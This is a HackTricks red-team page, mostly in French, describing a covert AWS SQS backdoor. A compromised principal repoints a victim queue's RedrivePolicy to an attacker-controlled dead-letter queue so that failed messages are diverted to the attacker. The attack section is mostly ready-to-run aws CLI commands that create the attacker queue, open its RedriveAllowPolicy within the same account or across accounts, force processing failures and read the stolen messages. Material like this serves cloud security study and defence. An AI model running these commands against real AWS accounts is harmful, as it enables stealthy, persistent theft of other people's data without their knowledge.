AWS - SQS DLQ Backdoor Persistence via RedrivePolicy/RedriveAllowPolicy

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

Abuser les SQS Dead-Letter Queues (DLQs) pour siphonner discrĂštement des donnĂ©es d’une file d’attente source victime en pointant sa RedrivePolicy vers une file d’attente contrĂŽlĂ©e par l’attaquant. Avec un maxReceiveCount faible et en provoquant ou en attendant des Ă©checs de traitement normaux, les messages sont automatiquement dĂ©tournĂ©s vers le DLQ de l’attaquant sans modifier les producteurs ni les Lambda event source mappings.

Permissions abusées

  • sqs:SetQueueAttributes on the victim source queue (to set RedrivePolicy)
  • sqs:SetQueueAttributes on the attacker DLQ (to set RedriveAllowPolicy)
  • Optional for acceleration: sqs:ReceiveMessage on the source queue
  • Optional for setup: sqs:CreateQueue, sqs:SendMessage

Flux dans le mĂȘme compte (allowAll)

Préparation (compte attaquant ou principal compromis):

REGION=us-east-1
# 1) Create attacker DLQ
ATTACKER_DLQ_URL=$(aws sqs create-queue --queue-name ht-attacker-dlq --region $REGION --query QueueUrl --output text)
ATTACKER_DLQ_ARN=$(aws sqs get-queue-attributes --queue-url "$ATTACKER_DLQ_URL" --region $REGION --attribute-names QueueArn --query Attributes.QueueArn --output text)

# 2) Allow any same-account source queue to use this DLQ
aws sqs set-queue-attributes \
--queue-url "$ATTACKER_DLQ_URL" --region $REGION \
--attributes '{"RedriveAllowPolicy":"{\"redrivePermission\":\"allowAll\"}"}'

Exécution (exécuter en tant que principal compromis dans le compte victime) :

# 3) Point victim source queue to attacker DLQ with low retries
VICTIM_SRC_URL=<victim source queue url>
ATTACKER_DLQ_ARN=<attacker dlq arn>
aws sqs set-queue-attributes \
--queue-url "$VICTIM_SRC_URL" --region $REGION \
--attributes '{"RedrivePolicy":"{\"deadLetterTargetArn\":\"'"$ATTACKER_DLQ_ARN"'\",\"maxReceiveCount\":\"1\"}"}'

Accélération (optionnelle):

# 4) If you also have sqs:ReceiveMessage on the source queue, force failures
for i in {1..2}; do \
aws sqs receive-message --queue-url "$VICTIM_SRC_URL" --region $REGION \
--max-number-of-messages 10 --visibility-timeout 0; \
done

Validation :

# 5) Confirm messages appear in attacker DLQ
aws sqs receive-message --queue-url "$ATTACKER_DLQ_URL" --region $REGION \
--max-number-of-messages 10 --attribute-names All --message-attribute-names All

Exemple de preuve (les attributs incluent DeadLetterQueueSourceArn):

{
"MessageId": "...",
"Body": "...",
"Attributes": {
"DeadLetterQueueSourceArn": "arn:aws:sqs:REGION:ACCOUNT_ID:ht-victim-src-..."
}
}

Variante inter-compte (byQueue)

DĂ©finissez RedriveAllowPolicy sur le DLQ de l’attaquant pour n’autoriser que les ARNs des files d’attente source spĂ©cifiques de la victime:

VICTIM_SRC_ARN=<victim source queue arn>
aws sqs set-queue-attributes \
--queue-url "$ATTACKER_DLQ_URL" --region $REGION \
--attributes '{"RedriveAllowPolicy":"{\"redrivePermission\":\"byQueue\",\"sourceQueueArns\":[\"'"$VICTIM_SRC_ARN"'\"]}"}'

Impact

  • Data exfiltration/persistence furtive et durable en dĂ©tournant automatiquement les messages Ă©chouĂ©s d’une queue source SQS victime vers une DLQ contrĂŽlĂ©e par l’attaquant, avec un bruit opĂ©rationnel minimal et sans modification des producers ni des Lambda mappings.

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks